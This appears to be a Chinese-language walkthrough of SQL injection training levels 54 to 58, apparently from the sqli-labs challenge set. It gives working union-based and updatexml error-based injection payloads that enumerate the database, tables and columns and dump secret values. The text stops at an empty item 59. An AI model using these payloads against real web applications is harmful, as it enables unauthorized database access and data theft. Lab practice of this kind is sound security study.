54.10次的尝试中从数据库的随机表中转储,每次重置,挑战都会生成随机表名、列名和表数据。payload:?id=3’%23,正常显示,先查看数据库名称。payload:?id=-3’ union select 1,2,database()%23
接下来查看表名称。payload:/?id=-3’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘challenges’ %23
接下来查看列名称。payload:?id=-3’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘ovaql73xm2’ %23
查看内容。payload:?id=-3’ union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23
55.测试后本题为括号。其余与上一关相同。payload:?id=-3) union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23
56.测试后发现为单引号加括号。payload:?id=-3’) union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23
57.双引号,其余上之前相同。payload:?id=-3" union select sessid,secret_1Z3Z,tryy from challenges.ovaql73xm2 %23
58.只有5步了。先获取数据库,payload:?id=1’ and updatexml(1,concat(’~’,(select database()),’~’),3);%23。challenges。接下来爆表名称。payload:?id=1%27%20and%20updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=‘challenges’) ),1);%23。lbocfsf9yp
获得列名。payload:?id=0’ or updatexml(1,(select (concat(1,(select group_concat(column_name) from information_schema.columns where table_name=‘lbocfsf9yp’))) from information_schema.tables limit 0,1),1)%23
爆出数据。payload:?id=0’ or updatexml(1,(select (select concat(1,secret_S4XE) from challenges.lbocfsf9yp limit 0,1) from information_schema.tables limit 0,1),1)%23
59.